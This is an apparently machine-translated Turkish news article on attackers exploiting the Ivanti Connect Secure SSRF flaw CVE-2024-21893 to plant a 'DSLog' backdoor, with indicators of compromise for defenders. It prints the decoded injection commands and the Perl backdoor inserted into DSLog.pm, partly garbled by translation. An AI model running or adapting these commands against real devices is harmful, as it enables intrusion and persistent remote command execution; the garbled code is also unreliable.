Bilgisayar korsanları, DSLog Kötü Amaçlı Yazılım Eklemek için Ivanti SSRF kusurundan yararlanıyor


Bilgisayar korsanları, DSLog Kötü Amaçlı Yazılım Eklemek için Ivanti SSRF kusurundan yararlanıyor

Ivanti Connect Secure, daha önce, SAML modülündeki bir kusur nedeniyle kimliği doğrulanmamış tehdit aktörlerinin sınırsız kaynaklara erişmesine izin verebilecek başka bir SSRF güvenlik açığıyla keşfedilmişti. Güvenlik açığına CVE-2024-21893 atandı ve önem derecesi 8,2 (Yüksek) idi.

Ayrıca bu güvenlik açığının daha önce ifşa sırasında ortadaki tehdit aktörleri tarafından istismar edildiği bildirilmişti. Ancak son raporlar, tehdit aktörlerinin bu güvenlik açığından yararlanarak savunmasız cihazlara daha önce bilinmeyen ve heyecan verici bir “DSLog arka kapısı” kurduğunu gösteriyor.

Belge

Canlı Hesap Devralma Saldırısı Simülasyonu

Canlı saldırı simülasyonu Web Semineri, hesap ele geçirmenin çeşitli yollarını gösterir ve web sitelerinizi ve API’lerinizi ATO saldırılarına karşı korumaya yönelik uygulamaları gösterir.


Hackerlar Ivanti SSRF Kusurunu İstismar Ediyor

Raporlara göre bu güvenlik açığı, tehdit aktörlerinin komut enjeksiyonu ile bir arka kapı enjekte ederek istismar ettiği Ivanti cihazlarındaki yerleşik SAML modülünü etkiliyor. Bu arka kapıya temel bir “API Anahtarı” mekanizmasıyla erişiliyordu ve kontrol ediliyordu.

İlk istek

Saldırının ilk aşamasında, tehdit aktörleri “RetrievalMethod URI” ile kodlanmış bir komuttan oluşan, kimliği doğrulanmamış bir SAML kimlik doğrulama isteği gönderir. İsteğin, URI’nin yanında base64 kodlu bir komut içeren URL kodlu bir istek olduğu belirlendi.

URL ve base64 isteğinin kodunun çözülmesi, tehdit aktörlerinin istismar için kullandığı aşağıdaki komut satırını sağlar.

http://127.0.0.1:8090/api/v1/license/keys-status/;echo echo $(uname –
a;id)>/home/webserver/htdocs/dana-na/imgs/index2.txt| /usr/bin/base64 -d | /bin/bash;

Bu komut, dahili keşif bilgilerini toplar ve ‘echo’ komut satırı aracını kullanarak bunu “index2.txt” adlı bir dosyaya kaydeder. Kodlanmış dizelerin kodu, base64 kod çözme yardımcı programı ve bash komut yorumlayıcısı kullanılarak da çözülür.

Arka Kapı Kurulumu

Yukarıdaki komut başarılı bir şekilde yürütüldükten sonra, tehdit aktörleri aynı URL yöntemini ve komutların Base64 kodlamasını kullanarak güvenlik açığı bulunan cihaza arka kapıyı yüklemeye çalışır. Talep şu şekilde:

http://127.0.0.1:8090/api/v1/license/keys-status/;echo mount -o remount,rw /
DESTDOSYA=”/home/perl/DSLog.pm”
CLFILE=”/home/perl/DSLogMB.pm”
if cat $DESTFILE | grep -q ‘HTTP_USER_AGENT’; Daha sonra
yankı ‘Tamam’;
başka
sed -i ‘102i\\ benim \$ua = \$\ENV{HTTP_USER_AGENT};\n benim \$req =
\$\ENV{QUERY_STRING};\n benim \$qur =
\”da58bdb765904300581fe8a818c28cca7c0b62eabd7ce29f181924177c8f13c7\”;\n benim @param =
split(/&/, \$req);\n if (index(\$ua, \$qur) != -1) {\n if (\$param[1]){\n @res = split(/=/,
\$param[1]);\n if (\$res[0] eq \”cdi\”){\n \$res[1] =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex(\$1))/örneğin;\n
\$res[1] =~ tr/!-~/P-~!-O/;\n system(\${res[1]});\n }\n }\n }’ $DESTFILE
fi
/bin/touch -r $CLFILE $DESTFILE
rm -rf /var/çekirdekler/*
/home/venv3/bin/python3 -c ‘DSMonitor’u içe aktar;DSMonitor.warmRestart()’| /usr/bin/base64 -d |
/bin/bash;
Arka kapı komutunun şifresi çözüldü (Kaynak: Orange Cyber ​​Defense)

Bu arka kapı komutu, ele geçirilen cihazda yürütülür ve arka kapı, “DSLog.pm” adlı mevcut bir Perl dosyasına eklenir. DSLog, kimliği doğrulanmış web isteklerini ve web isteklerini ve cihazdaki sistem günlüklerini günlüğe kaydetmekten sorumlu bir modüldür.

Orange Cyber ​​Defense, güçlü bir teknik altyapıya sahip olanlar için arka kapı, komut yürütme, metodolojiler ve diğer teknik ayrıntıların kapsamlı bir dökümünü sunar.

Uzlaşma Göstergeleri

Ana bilgisayar tabanlı IoC

Yol + dosya adı Doğramak Tanım
/root/home/perl/DSLog[.]öğleden sonra Yok – değişiklik gösterir Meşru DSLog Log modülü
/root/home/webserver/htdocs/danana/imgs/index[.]txt Yok – değişiklik gösterir arka kapı
/root/home/webserver/htdocs/danana/imgs/index1[.]txt Yok – değişiklik gösterir Bazıları rastgele karakterler gibi görünüyor.
/root/home/webserver/htdocs/danana/imgs/index2[.]txt Yok – değişiklik gösterir Bazıları rastgele karakterler gibi görünüyor.
/root/home/web sunucusu/htdocs/danana/imgs/logo[.]png ‘uname -a’ sonucunun yerleştirilmesi

Ağ tabanlı IoC

Ağ Göstergesi Tip Tanım
159.65.123.122 IP adresi Büyük sömürü faaliyeti

Siber Güvenlik haberleri, Teknik İncelemeler ve İnfografiklerden haberdar olun. Bizi LinkedIn’de takip edin & heyecan.





Source link